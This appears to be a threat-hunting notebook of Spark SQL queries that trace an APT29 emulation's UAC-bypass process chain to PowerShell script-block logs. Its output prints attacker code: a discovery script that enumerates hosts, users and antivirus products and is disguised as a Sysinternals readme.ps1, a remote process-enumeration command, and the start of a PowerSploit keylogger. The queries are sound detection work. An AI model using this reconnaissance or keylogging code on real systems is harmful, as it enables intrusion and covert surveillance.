----------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID: 6F3D1615-69D6-41C6-90D0-39ACA14941BD

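# Query ID 6F3D1615-69D6-41C6-90D0-39ACA14941BD
# Security-log (EventID 4688) variant: returns PowerShell script-block text
# (EventID 4104) that references $env:USERNAME and was logged by a
# powershell.exe whose lineage is sdclt.exe -> control.exe -> elevated child
# -> powershell.exe.
#
# Join chain (all Security 4688 unless noted):
#   b: control.exe created by sdclt.exe
#   a: process created by b (a.ProcessId, the creator id, equals b.NewProcessId),
#      running at MandatoryLabel S-1-16-12288 (High) with TokenElevationType
#      %%1937 (TokenElevationTypeFull, a fully elevated token)
#   d: powershell.exe created by a
#   f: Microsoft-Windows-PowerShell/Operational 4104 emitted by d's process
#
# Process-id normalisation: 4688 records NewProcessId as a "0x..." hex string,
# while 4104's ExecutionProcessID is numeric, so d's value is split on "0x"
# and f's is rendered with hex() and lowered before the final join.
#
# d.NewProcessName is lowered before the LIKE, matching the sibling
# NewProcessName/ParentProcessName predicates, so a mixed-case path in the
# log (Windows paths are not case-sensitive) is not silently excluded.
#
# "%$env:username%" is a plain substring match on the lowered script text and
# would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:username%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)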
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.3. System Information Discovery

Procedure: Enumerated the computer hostname using PowerShell

Criteria: powershell.exe executing $env:COMPUTERNAME

Detection Type: Telemetry (Correlated)

Query ID: 9B610803-2B27-4DA4-9AAC-C859F48510DA

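# Query ID 9B610803-2B27-4DA4-9AAC-C859F48510DA
# Sysmon variant: returns PowerShell script-block text (EventID 4104) that
# references $env:COMPUTERNAME and was logged by a powershell.exe whose lineage
# is sdclt.exe -> control.exe -> High-integrity child -> powershell.exe.
#
# Join chain (all Sysmon EventID 1 unless noted):
#   b: control.exe whose ParentImage is sdclt.exe
#   a: process whose ParentProcessGuid is b's ProcessGuid, IntegrityLevel "High"
#   d: powershell.exe whose ParentProcessGuid is a's ProcessGuid
#   f: Microsoft-Windows-PowerShell/Operational 4104 whose ExecutionProcessID
#      equals d.ProcessId (both numeric, so no hex conversion is needed here)
#
# d.Image is lowered before the LIKE, matching the sibling Image/ParentImage
# predicates, so a mixed-case path in the log (Windows paths are not
# case-sensitive) is not silently excluded.
#
# "%$env:computername%" is a plain substring match on the lowered script text
# and would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:computername%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)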
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID: 1BA09833-CDF3-44BE-86D0-6F5B1C66D151

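# Query ID 1BA09833-CDF3-44BE-86D0-6F5B1C66D151
# Security-log (EventID 4688) variant: returns PowerShell script-block text
# (EventID 4104) that references $env:COMPUTERNAME and was logged by a
# powershell.exe whose lineage is sdclt.exe -> control.exe -> elevated child
# -> powershell.exe.
#
# Join chain (all Security 4688 unless noted):
#   b: control.exe created by sdclt.exe
#   a: process created by b (a.ProcessId, the creator id, equals b.NewProcessId),
#      running at MandatoryLabel S-1-16-12288 (High) with TokenElevationType
#      %%1937 (TokenElevationTypeFull, a fully elevated token)
#   d: powershell.exe created by a
#   f: Microsoft-Windows-PowerShell/Operational 4104 emitted by d's process
#
# Process-id normalisation: 4688 records NewProcessId as a "0x..." hex string,
# while 4104's ExecutionProcessID is numeric, so d's value is split on "0x"
# and f's is rendered with hex() and lowered before the final join.
#
# d.NewProcessName is lowered before the LIKE, matching the sibling
# NewProcessName/ParentProcessName predicates, so a mixed-case path in the
# log (Windows paths are not case-sensitive) is not silently excluded.
#
# "%$env:computername%" is a plain substring match on the lowered script text
# and would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:computername%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)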
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.4. System Network Configuration Discovery

Procedure: Enumerated the current domain name using PowerShell

Criteria: powershell.exe executing $env:USERDOMAIN

Detection Type: Telemetry (Correlated)

Query ID: 1418A09E-BC90-4BC5-A0BC-1ECC4283ACF4

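# Query ID 1418A09E-BC90-4BC5-A0BC-1ECC4283ACF4
# Sysmon variant: returns PowerShell script-block text (EventID 4104) that
# references $env:USERDOMAIN and was logged by a powershell.exe whose lineage
# is sdclt.exe -> control.exe -> High-integrity child -> powershell.exe.
#
# Join chain (all Sysmon EventID 1 unless noted):
#   b: control.exe whose ParentImage is sdclt.exe
#   a: process whose ParentProcessGuid is b's ProcessGuid, IntegrityLevel "High"
#   d: powershell.exe whose ParentProcessGuid is a's ProcessGuid
#   f: Microsoft-Windows-PowerShell/Operational 4104 whose ExecutionProcessID
#      equals d.ProcessId (both numeric, so no hex conversion is needed here)
#
# d.Image is lowered before the LIKE, matching the sibling Image/ParentImage
# predicates, so a mixed-case path in the log (Windows paths are not
# case-sensitive) is not silently excluded.
#
# "%$env:userdomain%" is a plain substring match on the lowered script text
# and would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:userdomain%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)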
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID: 8D215D46-CE33-4CB7-9934-FF9205971570

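# Query ID 8D215D46-CE33-4CB7-9934-FF9205971570
# Security-log (EventID 4688) variant: returns PowerShell script-block text
# (EventID 4104) that references $env:USERDOMAIN and was logged by a
# powershell.exe whose lineage is sdclt.exe -> control.exe -> elevated child
# -> powershell.exe.
#
# Join chain (all Security 4688 unless noted):
#   b: control.exe created by sdclt.exe
#   a: process created by b (a.ProcessId, the creator id, equals b.NewProcessId),
#      running at MandatoryLabel S-1-16-12288 (High) with TokenElevationType
#      %%1937 (TokenElevationTypeFull, a fully elevated token)
#   d: powershell.exe created by a
#   f: Microsoft-Windows-PowerShell/Operational 4104 emitted by d's process
#
# Process-id normalisation: 4688 records NewProcessId as a "0x..." hex string,
# while 4104's ExecutionProcessID is numeric, so d's value is split on "0x"
# and f's is rendered with hex() and lowered before the final join.
#
# d.NewProcessName is lowered before the LIKE, matching the sibling
# NewProcessName/ParentProcessName predicates, so a mixed-case path in the
# log (Windows paths are not case-sensitive) is not silently excluded.
#
# "%$env:userdomain%" is a plain substring match on the lowered script text
# and would match benign scripts on its own; the lineage join is what narrows it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:userdomain%"

'''
)
# Full, untruncated Message column per record; the script block is multi-line.
df.show(100, truncate=False, vertical=True)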
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.5. Process Discovery

Procedure: Enumerated the current process ID using PowerShell

Criteria: powershell.exe executing $PID

Detection Type: Telemetry (Correlated)

Query ID: 2DBE08DB-BADD-40AD-A037-DEBD29E207C6

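# 4.C.5 Process Discovery: find PowerShell script-block logging events
# (Microsoft-Windows-PowerShell/Operational, EventID 4104) whose script text
# references $PID, and correlate them back to the process lineage seen in this
# step rather than matching any 4104 event on the host. Sub-queries, inside out:
#   b: Sysmon EventID 1 for control.exe whose parent is sdclt.exe
#   c: Sysmon EventID 1 children of b that run at IntegrityLevel "High"
#   d: Sysmon EventID 1 for a powershell.exe child of c
#   e: the ProcessId of d, joined to the 4104 event's ExecutionProcessID
# Sysmon ProcessId and ExecutionProcessID are both decimal, so they are compared
# directly; the Security-log (4688) variant of this correlation earlier in the
# notebook needs hex() on ExecutionProcessID because NewProcessId is hexadecimal.
# Every image comparison is wrapped in LOWER() so a mixed-case Image value
# (e.g. "PowerShell.exe") still matches; the d.Image predicate was previously
# the only case-sensitive one in the chain.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid = c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$pid%"
'''
)
# Show every matching script block untruncated; the vertical layout keeps the
# multi-line Message text readable in the notebook output.
df.show(100, truncate=False, vertical=True)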
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
